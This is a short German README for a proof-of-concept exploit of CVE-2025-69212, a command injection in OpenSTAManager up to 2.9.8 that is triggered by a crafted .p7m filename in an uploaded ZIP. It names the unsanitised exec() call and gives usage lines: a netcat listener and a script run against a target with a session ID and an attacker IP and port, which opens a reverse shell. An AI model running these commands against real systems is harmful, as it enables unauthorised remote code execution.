
Proof-of-concept-Exploit für CVE-2025-69212: Befehlsinjektion im Betriebssystem in OpenSTAManager <= 2.9.8 über einen bösartigen .p7m-Dateinamen beim ZIP-Upload, die Remotecodeausführung ermöglicht.
OpenSTAManager <= 2.9.8 — OS-Befehlsinjizierung durch schädliche .p7m-Dateinamen in ZIP-Upload.
Datei: src/Util/XML.php:100 — nicht bereinigtes $file in exec()
Vektor: /plugins/importFE_ZIP/actions.php → ZIP → .p7m-Dateiname → exec("openssl smime ... -in \"$file\" ...")
# Listener
nc -lvnp 4444
# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444